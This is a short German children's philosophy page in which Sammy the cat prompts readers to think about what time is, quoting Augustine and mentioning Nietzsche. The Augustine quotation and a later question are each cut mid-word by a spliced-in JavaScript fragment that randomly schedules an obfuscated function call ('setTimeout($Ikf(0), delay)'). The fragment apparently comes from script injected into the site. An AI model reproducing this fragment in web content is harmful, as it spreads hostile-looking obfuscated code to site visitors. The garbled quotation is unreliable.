Der Philosophenkater Sammy genießt die Sommerzeit! Alle viere von sich gestreckt, liegt er im Schatten.

Sammy und die Sommerzeit (Bild: privat)In den Ferien hast du vermutlich mehr Zeit als sonst und freust dich darüber. Du hast mehr Zeit oder besser gesagt mehr freie Zeit und kannst öfters selbst entscheiden, was du machst. Was aber ist ZEIT?

Der berühmte Philosoph AUGUSTINUS, der vor etwas weniger als 2000 Jahren lebte, meinte auf diese Frage: „Wenn mich jemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and fragt, dann weiß ich es; sobald ich aber gefragt werde, kann ich es nicht erklären.“

Was würdest du antworten auf die Frage: WAS IST ZEIT?

Warum sagen manche Menschen, sie hätten keine Zeit? Hat jeder Mensch gleich viel Zeit? Gibt es Menschen, die über die Zeit andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderer bestimmen? Was machst du mit deiner Zeit?

Viele Philosophen haben sich mit dem Thema „Zeit“ beschäftigt, zum Beispiel Nietzsche. Lies doch einmal den Beitrag:  Jeder Augenblick zählt

Comments are closed.